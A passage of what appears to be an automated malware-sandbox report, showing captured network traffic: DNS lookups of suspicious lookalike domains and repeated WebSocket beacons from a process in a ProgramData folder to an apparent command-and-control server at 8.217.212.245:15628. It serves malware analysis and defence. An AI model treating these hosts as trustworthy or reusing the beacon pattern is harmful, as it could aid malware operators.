                                                                                                                                                                                                  Dec 29, 2024 16:16:38.241717100 CET44349977183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986685991 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986767054 CET50042443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986793995 CET4435004235.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:16:38.986840963 CET50042443192.168.2.635.227.223.56

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Dec 29, 2024 16:15:26.834551096 CET6375353192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.200592995 CET53637531.1.1.1192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.941689014 CET5811253192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.942339897 CET6513853192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.942543030 CET5046153192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080425024 CET53651381.1.1.1192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080535889 CET53504611.1.1.1192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.268100023 CET53581121.1.1.1192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.314297915 CET5945853192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.539443970 CET5946053192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.540379047 CET5946153192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.541114092 CET5048353192.168.2.61.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.542922974 CET5048453192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664216995 CET50485443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.921224117 CET53594618.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET53594608.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET53504848.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET53504831.1.1.1192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948832035 CET50486443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:34.279846907 CET50487443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:36.608473063 CET51140443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:38.822057962 CET51141443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:41.062215090 CET51142443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:43.353662968 CET51143443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:45.624725103 CET51144443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.881417990 CET51145443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:50.078459978 CET51146443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.399096966 CET51147443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.610990047 CET51148443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.376517057 CET51149443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:16:00.055042982 CET51150443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.686291933 CET51151443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:05.280450106 CET51152443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:08.228600025 CET51153443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:16:11.311911106 CET51154443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:14.065841913 CET51155443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:16.379864931 CET51156443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:18.678131104 CET51157443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:16:20.895240068 CET51158443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:22.942528963 CET51159443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:16:36.967613935 CET51160443192.168.2.635.227.223.56

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                  Dec 29, 2024 16:15:26.834551096 CET192.168.2.61.1.1.10x2380Standard query (0)ws-ap1.pusher.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.941689014 CET192.168.2.61.1.1.10x1855Standard query (0)www.yandex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.942339897 CET192.168.2.61.1.1.10x248aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.942543030 CET192.168.2.61.1.1.10x8f2dStandard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.314297915 CET192.168.2.61.1.1.10x5cfaStandard query (0)in.appcenter.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.539443970 CET192.168.2.68.8.8.80xda5bStandard query (0)nal.fqoqehwib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.540379047 CET192.168.2.68.8.8.80xa642Standard query (0)chr.alipayassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.541114092 CET192.168.2.61.1.1.10xb79dStandard query (0)d1dmgcawtbm6l9.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.542922974 CET192.168.2.68.8.8.80x280cStandard query (0)nit.crash1ytics.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.200592995 CET1.1.1.1192.168.2.60x2380No error (0)ws-ap1.pusher.comsocket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.200592995 CET1.1.1.1192.168.2.60x2380No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com18.136.85.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.200592995 CET1.1.1.1192.168.2.60x2380No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com13.228.227.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.200592995 CET1.1.1.1192.168.2.60x2380No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com18.136.139.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080425024 CET1.1.1.1192.168.2.60x248aNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080535889 CET1.1.1.1192.168.2.60x8f2dNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080535889 CET1.1.1.1192.168.2.60x8f2dNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080535889 CET1.1.1.1192.168.2.60x8f2dNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.080535889 CET1.1.1.1192.168.2.60x8f2dNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.268100023 CET1.1.1.1192.168.2.60x1855No error (0)www.yandex.comyandex.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.268100023 CET1.1.1.1192.168.2.60x1855No error (0)yandex.com77.88.55.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.268100023 CET1.1.1.1192.168.2.60x1855No error (0)yandex.com77.88.44.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.268100023 CET1.1.1.1192.168.2.60x1855No error (0)yandex.com5.255.255.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.452893972 CET1.1.1.1192.168.2.60x5cfaNo error (0)in.appcenter.msin-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.921224117 CET8.8.8.8192.168.2.60xa642No error (0)chr.alipayassets.com85.222.79.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.921224117 CET8.8.8.8192.168.2.60xa642No error (0)chr.alipayassets.com12.206.118.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.921224117 CET8.8.8.8192.168.2.60xa642No error (0)chr.alipayassets.com222.91.58.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.921224117 CET8.8.8.8192.168.2.60xa642No error (0)chr.alipayassets.com129.180.217.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com33.86.72.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com200.200.101.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com191.244.156.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com82.150.106.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com6.114.13.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com10.176.38.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.039906025 CET8.8.8.8192.168.2.60xda5bNo error (0)nal.fqoqehwib.com104.112.172.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com67.137.174.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com19.88.16.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com223.61.70.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com142.242.204.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com124.119.121.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.085493088 CET8.8.8.8192.168.2.60x280cNo error (0)nit.crash1ytics.com4.159.142.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.214698076 CET1.1.1.1192.168.2.60xb79dNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.159A (IP address)IN (0x0001)false

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  • 8.217.212.245:15628
                                                                                                                                                                                                  • ws-ap1.pusher.com

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.6497308.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:14:33.560028076 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: EAIFCJJtIpBBrGEUCHJJUtCpE
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.6497508.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:14:40.930923939 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: hgEoGyIHHcKxHmeBCkGUPHIER
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.6497698.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:14:48.571012974 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: EHDtHuIBUdDVfHXhrVyFEUGzF
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  3192.168.2.6497878.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:14:55.917619944 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: COcjDJHEDQoOInBCDDGFarHDU
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  4192.168.2.6498048.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:03.291205883 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: qphGfKuJZRHBtITmGBcfpvVDU
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  5192.168.2.6498228.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:10.654129028 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: UqeIpIqArHhSexIQlmFYlJBoG
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  6192.168.2.6498408.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:18.011476040 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: DXBHDqPpLFlTgCIrHHBxEKHKP
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  7192.168.2.6498578.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:25.464725018 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: hyKyGMDiwJKCSQjDasFQwJaKH
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  8192.168.2.64986218.136.85.30804820C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.395387888 CET265OUTGET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1
                                                                                                                                                                                                  Host: ws-ap1.pusher.com
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Sec-WebSocket-Key: ZmQxOTJiYTctZGRlMS00Zg==
                                                                                                                                                                                                  Origin: ws://ws-ap1.pusher.com
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.998764992 CET166INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:15:28 GMT
                                                                                                                                                                                                  Connection: upgrade
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Accept: /lIrq6W0b1fOEX3Qqf4D7edtBBE=
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.700167894 CET242INData Raw: 81 7e 00 92 7b 22 65 76 65 6e 74 22 3a 22 70 75 73 68 65 72 3a 65 72 72 6f 72 22 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 34 30 30 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 70 70 20 6b 65 79 20 34 66 63 34 33 36 65 66 33 36 66 34 30 32 36
                                                                                                                                                                                                  Data Ascii: ~{"event":"pusher:error","data":{"code":4001,"message":"App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?"}}ZApp key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.751595974 CET8OUTData Raw: 88 82 d5 53 2a 0f d6 bb
                                                                                                                                                                                                  Data Ascii: S*


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  9192.168.2.6498868.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.707348108 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: WfxndBCwxGPkHVEIkfBOKFtIS
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  10192.168.2.6499078.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:40.103064060 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: CGuKfKJpiJIQgrIIGFFIHJHHJ
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  11192.168.2.6499328.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:47.563971043 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: yhrCHtBBGdQDZCyKHJjbdBnHK
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  12192.168.2.6499528.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.916284084 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: FoPFDZlWHBTCtkBnNJIzYtBHV
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  13192.168.2.6499708.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:16:02.265670061 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: BKUcFWzXCrUNNGuBHHCSIyZHK
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  14192.168.2.6499898.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:16:09.613966942 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: oqRHpJDqHRNDHUVBBFHIccFjW
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  15192.168.2.6500108.217.212.245156286368C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:16:16.964860916 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: WwPxFgueJfqDBCQDPnCJYZTEB
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                  16192.168.2.6500338.217.212.24515628
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:16:25.176661968 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: KdIFBVttISDfKflFDZBItwEBs
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                  17192.168.2.6500418.217.212.24515628
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:16:32.526065111 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: iDHKdRHDOTuLoEMRwtCCiifOE
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628


                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.64987913.227.9.244434820C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:15:32 UTC180OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:15:33 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
